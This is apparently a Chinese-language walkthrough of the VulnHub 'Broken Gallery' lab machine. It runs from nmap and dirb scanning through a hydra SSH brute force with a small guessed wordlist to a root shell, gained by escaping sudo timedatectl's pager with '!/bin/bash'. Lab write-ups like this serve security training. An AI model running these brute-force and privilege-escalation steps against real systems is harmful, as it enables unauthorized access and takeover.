信息收集:
靶机地址:http://www.vulnhub.com/entry/broken-gallery,344/
(1)ip扫描,扫不到,配置仅主机就可以了
nmap 192.168.8.0/24 -sn | grep -B 2 '00:0C:29:CF:9F:D0'
(2)端口扫描
nmap 192.168.8.131 -p- -A -sV -Pn
(3)目录扫描,没啥发现
dirb http://192.168.8.131
(4)访问80端口,可以看到有一些文件
(5)readme.md 中是十六进制的值
(6)将内容写入readme.md中,使用 xxd 转换,查看文件,发现文件头为 JFIF ,是一张图片
(7)将后缀修改为 jpg ,查看图片
mv readme.bin readme.jpg
(8)一段留言,把上面的一些可能作为账号密码的字符拿下来,写个简单的字典,尝试爆破 ssh
Bob
BROKEN
avrahamcohen.ac
broken
getshell:
(1)使用 hydra 进行爆破
hydra -L use.txt -P pas.txt ssh://192.168.8.131
得到账号密码:
broken:broken
(2)ssh连接,连接成功
ssh broken@192.168.8.131
提权:
(1)查看当前权限
sudo -l
(2)看到 timedatectl 可以执行root权限,执行命令,提权成功
sudo timedatectl list-timezones
!/bin/bash